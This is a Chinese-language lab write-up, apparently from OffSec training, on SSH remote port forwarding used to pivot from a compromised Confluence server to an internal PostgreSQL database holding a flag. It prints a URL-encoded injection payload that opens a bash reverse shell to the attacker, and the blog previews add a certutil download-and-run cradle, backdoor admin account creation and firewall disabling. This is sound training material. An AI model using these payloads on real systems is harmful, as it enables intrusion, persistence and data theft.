SSH Tunneling - Remote Port Forwarding

-

SSH Tunneling - Remote Port Forwarding


攻擊機 192.168.45.199

靶機 192.168.215.63、10.4.215.215

此環境限制是靶機端因防火牆的配置使得在 CONFLUENCE01 的 WAN 介面上綁定的端口無法順利連接,可以從 Kali 攻擊端機器連接到靶機的唯一端口是 TCP 8090

本次要利用的場景環境示意圖如下




將透過 SSH 從 CONFLUENCE01 連接到我們的 Kali 攻擊機器

Listen TCP 2345 Port 並綁定到 Kali 攻擊機器上的 loopback interface

傳送至此連接埠的封包由 Kali SSH 伺服器軟體透過 SSH 隧道推送回 CONFLUENCE01 上的 SSH 用戶端。然後它們被轉送到 PGDATABASE01 上的 PostgreSQL 資料庫連接埠。


第一步先確認 Kali 攻擊機上的 OPENSSH 服務啟動

指令 sudo systemctl start ssh



為了使用使用者名稱和密碼連接回 Kali SSH 伺服器,必須透過在 /etc/ssh/sshd_config 中將PasswordAuthentication 設定為 yes 來明確允許基於密碼的身份驗證





一樣先漏洞利用連回攻擊機 4444 Port 拿到 Remote Shell

curl -v http://192.168.215.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.199/4444%200%3E%261%27%29.start%28%29%22%29%7D/

然後確保 TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'




然後透過 連回 Kali SSH 並起 loopback 2345 Port 對應到遠端 10.4.215.215 5432 的 PostgreSQL Port,指令 ssh -N -R 127.0.0.1:2345:10.4.215.215:5432 kali@192.168.45.199

參數 -R : SSH 遠端連接埠轉送

最後一行雖然寫 failed 但先不用理他




在 kali 攻擊機上查看 ss -ntplu,已經起來了




目前的連線關係圖如下





接著直接在攻擊機上對自己的 2345 Port 下指令,實際上是從 CONFLUENCE01 送指令出去到

10.4.215.215 的 5432 Port,可以看到已經連到 PostgreSQL 那一台了

psql -h 127.0.0.1 -p 2345 -U postgres





列舉一下 DB,\l




接著選擇 hr_backup 資料庫,postgres-# \c hr_backup




接著 \dt 列出所有資料表,可以看到有個資料表 payroll



接著 \d payroll 列出 Table 欄位,可以看到有個欄位叫做 flag,看來答案在此表中




將資料抓出來看看,指令 select * from payroll;,拿到答案了




PostgreSQL 指令可以參考 https://hackmd.io/@TgCSOOWNTu62i4zpeQdzrA/r1Pe_6LDj




練習 : 

從 CONFLUENCE01 上的 Web 伺服器下載 /exercises/ssh_remote_client 處的二進位檔案 。

在 CONFLUENCE01 上建立 SSH 遠端連接埠轉發

讓您可以從 Kali 機器上針對 PGDATABASE01 上的連接埠 4444 執行二進位檔案。

注意:用於建置 ssh_remote_client 二進位檔案的來源檔案可以從 /exercises/client_source.zip 下載


先下載 ssh_remote_client,http://192.168.215.63:8090/exercises/ssh_remote_client




再下載 client_source.zip,http://192.168.215.63:8090/exercises/client_source.zip




下載後解壓縮並將檔案放在一起,建立了一個 1833 的資料夾




一樣第一步漏洞利用建立遠端的 Shell

curl -v http://192.168.215.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.199/1234%200%3E%261%27%29.start%28%29%22%29%7D/

然後確保 TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'






然後透過 連回 Kali SSH 並起 loopback 4444 Port 對應到遠端 10.4.215.215 4444 Port

指令 ssh -N -R 127.0.0.1:4444:10.4.215.215:4444 kali@192.168.45.199

參數 -R : SSH 遠端連接埠轉送

最後一行雖然寫 failed 但先不用理他





接著直接在攻擊機上對自己的 4444 Port 下指令,實際上是從 CONFLUENCE01 送指令出去到

10.4.215.215 的 4444 Port,./ssh_remote_client -p 4444 -i 127.0.0.1

記得要將 ssh_remote_client 權限改成可執行,就拿到 flag 了




留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容

Challenge 8 - Poseidon(0)

-
圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...
閱讀完整內容